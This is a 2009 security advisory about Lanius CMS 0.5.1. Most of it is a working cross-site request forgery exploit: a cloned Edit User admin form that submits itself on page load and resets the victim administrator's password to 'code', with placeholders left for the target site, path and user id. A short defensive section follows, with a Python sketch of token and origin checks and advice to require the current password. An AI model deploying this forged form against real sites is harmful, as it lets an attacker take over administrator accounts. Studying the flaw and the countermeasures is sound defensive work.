Lanius CMS 0.5.1 XSRF

10 Feb 2009 00:00:00 | Reported by d14l | Type: packetstorm | Source: packetstormsecurity.com

Lanius CMS 0.5.1 CSRF vulnerability allows admin password chang

Code
`[-]Lanius CMS 0.5.1 CSRF vulnerability  
  
[-]exploit found by d14l and marcoj  
  
  
  
[-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others  
  
  
[-] Lanius CMS suffers from CSRF vulnerabilities which allow an attacker to change the admin's password  
  
  
  
it is only important to change in the source [site], [path] and [id] of the victim, and it will change the victim's password to "code"  
  
  
  
  
  
  
//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////  
  
  
  
  
<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
var lcms_data_form='adminform';  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>  
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>  
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />  
  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
function _init_pwd_box() {  
initQualityMeter("user_password", "the_password", "Password quality: ");  
}  
pb_addEvent(window, "load", _init_pwd_box);  
  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
  
var dil_folder = 'media/forum/avatars/';  
var dil_default_src = 'media/forum/avatars/default.png';  
  
function changeImage(srcObj,srcListName) {  
var im=document.getElementById("image_"+srcListName);  
var obj_v = srcObj.value;  
if (obj_v==null || obj_v=="") im.src = dil_default_src;   
else im.src = dil_folder+obj_v;  
}  
  
  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
function ui_lcms_st(pressbutton){  
var frm=document.getElementById(lcms_data_form);  
if ( pressbutton == 'save' ) {  
  
var frm=document.getElementById('adminform');  
field_value=frm.user_name.value;  
if (!field_value.length) { alert("Invalid value for\n\nDisplay name");return false;  
}  
field_value=frm.user_user.value;  
if (!field_value.length) { alert("Invalid value for\n\nUsername");return false;  
}  
field_value=frm.user_email.value;  
if (!field_value.length) { alert("Invalid value for\n\nEmail");return false;  
}  
  
} if ( pressbutton == 'cancel' ) {  
document.location.href=frm.action; return;}  
  
lcms_st(pressbutton);  
}  
  
/* ]]> */  
</script>  
<script language="javascript" type="text/javascript">  
var cmThemeDefaultBase = "admin/templates/default/images/";  
</script>  
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>  
<script language="javascript" src="index2.php?option=service&service=admin_menu&no_html=1&lang=en" type="text/javascript"></script>  
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>  
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>  
  
<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />  
</head>  
<body>  
<body onload="ui_lcms_st('save');">  
  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td width="320" class="top-logo" >  
<img src="admin/templates/default/images/header.png" alt="Administration" />  
</td>  
<td width="240" class="top-update" >  
<a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard" /></a>   
</td>  
<td align="right" class="top-logo" ><a href="index.php?option=login&task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" />&nbsp;Logout</a>&nbsp;</td>  
  
</tr>  
</table>  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr class="toolmenu">  
<td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>  
<script language="javascript" type="text/javascript">  
cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault");  
</script>  
<noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>  
<td align="right">  
<table class="hotlinks" border="0" cellspacing="0" cellpadding="2">  
<tr><td>&nbsp;</td>  
  
</tr>  
</table>  
</td>  
<td align="right"></td>  
</tr>  
</table>  
<table width="100%" cellspacing="0" cellpadding="0">  
<tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&task=edit&cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td>  
</tr>  
  
</table>  
<div class="dka_component">  
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user' enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />  
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />  
<noscript>  
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>  
<select name="alt_task[]">  
<option value="">--</option>  
<option value="save">Save</option>  
<option value="cancel">Cancel</option>  
</select>  
<input type="submit" value="Go" /></noscript>  
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>  
<tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>  
  
<tr><td colspan='2' class="header1" >Edit User</td></tr>  
  
<tr><td colspan="2">  
<table width="100%" border="0" cellpadding="5" cellspacing="2" >  
<tr><td class="tabtitle">Edit User&nbsp;</td></tr><tr>  
  
<td class="tabbody">  
<table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">  
<tr><td width="200">&nbsp;</td><td>&nbsp;</td></tr>  
<tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf" size="40" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf" size="40" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="[email protected]" class="tf" size="40" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">  
<option value="" selected="selected" style="color: grey">-- Auto --</option>  
<option value="en">English</option>  
</select>  
</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">  
  
<option value="">-- Auto --</option>  
<option value="Africa/Abidjan">Africa/Abidjan</option>  
  
</select>  
</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">  
<option value="1">Registered</option>  
<option value="2">Editor</option>  
<option value="3">Publisher</option>  
<option value="4">Manager</option>  
<option value="5" selected="selected" style="color: grey">Administrator</option>  
  
</select>  
</td></tr>  
  
<tr><td colspan='2' class="" >&nbsp;</td></tr>  
  
<tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40' onkeypress="updateQualityMeter(this)" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40' /></td></tr>  
  
<tr><td colspan='2' class="" >&nbsp;</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">  
<input id="user_message_allow" name="user_message_allow" type="checkbox" />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">  
<input id="user_message_html" name="user_message_html" type="checkbox" />Can receive HTML emails</label><br /><label for="user_message_attach">  
<input id="user_message_attach" name="user_message_attach" type="checkbox" checked="checked"/>Receive also attachments</label><br />  
<div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>  
<td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >  
<option value="default.png" selected='selected' >< Current ></option>  
  
<option value="abstract8.png" >abstract8.png</option>  
  
  
</select></td>  
<td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>  
</tr></table>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
var tmpi_0 = new Image();  
tmpi_0.src="media/forum/avatars/default.png";  
  
/* ]]> */  
</script>  
</div>  
<div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />  
<input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45" /></div>  
<div class="dk_content">  
<h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>  
  
<p><h3>Forum user information</h3></p>  
<div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>  
<div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>  
<table border="0">  
<tr>  
<td valign="top">&nbsp;</td>  
<td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>  
  
</td>  
</tr>  
<tr>  
<td valign="top">User provided information (max 1024 characters)</td>  
<td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>  
</tr> <tr>  
<td valign="top">&nbsp;</td>  
  
<td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>  
</td>  
</tr>  
<tr>  
<td valign="top">Custom signature (max 300 characters)</td>  
  
<td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>  
</tr> </table></td></tr>  
  
</table></td></tr></table>  
</td></tr>  
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />  
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />  
<noscript>  
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>  
<select name="alt_task[]">  
<option value="">--</option>  
<option value="save">Save</option>  
<option value="cancel">Cancel</option>  
</select>  
<input type="submit" value="Go" /></noscript>  
</div></form></div>  
<div class="footer">  
<div title="Donate now EUR 10 for the Lanius CMS Project" align="center">  
  
<form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">  
<input name="cmd" value="_xclick" type="hidden" />  
<input name="business" value="[email protected]" type="hidden" />  
<input name="no_shipping" value="0" type="hidden" />  
<input name="lc" value="EN" type="hidden" />  
<input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />  
<input name="currency_code" value="EUR" type="hidden" />  
<input name="amount" value="10.00" type="hidden" />  
Support the Lanius CMS Project with a small donation:  
<input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />  
</form>  
</div>  
</div>  
</body>  
</html>  
  
////////////////////////////////////////////end of code////////////////////////////////////////////////`
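The form above posts user_id, user_password and user_password1 to admin.php?com_option=user with no per-session secret, so any page the logged-in admin opens can submit it. The sketch below is an added example, not Lanius CMS code and not part of the advisory: it models the server-side check that rejects such a request. The csrf_token field name, the cms.example origin and the session identifiers are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)    # per-deployment secret (constructed)
TRUSTED_ORIGIN = "https://cms.example"  # hypothetical origin of the admin site
TOKEN_FIELD = "csrf_token"              # hypothetical hidden field, absent from the form on the page


def issue_token(session_id):
    """Token the server would embed in the Edit User form, bound to one session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_post(session_id, headers, form):
    """Return (accepted, reason) for a state-changing POST to admin.php?com_option=user."""
    # 1. The request must originate from the site itself (Origin, else Referer).
    source = headers.get("Origin") or headers.get("Referer", "")
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != TRUSTED_ORIGIN:
        return False, "cross-origin request"
    # 2. The form must carry the token issued to this session (constant-time compare).
    supplied = form.get(TOKEN_FIELD, "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


SESSION = "sess-constructed-1"  # constructed session identifier
# Field names and values as they appear in the form on the page.
FORGED = {"user_id": "244", "user_user": "admin",
          "user_password": "code", "user_password1": "code"}


def demo():
    """Run the check over four constructed requests."""
    forged = check_post(SESSION, {"Origin": "https://other-site.example"}, FORGED)
    no_token = check_post(SESSION, {"Origin": TRUSTED_ORIGIN}, FORGED)
    legit_form = dict(FORGED, **{TOKEN_FIELD: issue_token(SESSION)})
    referer = {"Referer": TRUSTED_ORIGIN + "/admin.php?com_option=user"}
    legit = check_post(SESSION, referer, legit_form)
    replayed = check_post("sess-constructed-2", {"Origin": TRUSTED_ORIGIN}, legit_form)
    return forged, no_token, legit, replayed


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The form on the page also has no current-password field; requiring the existing password before accepting a new one is a second, independent control for this action.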
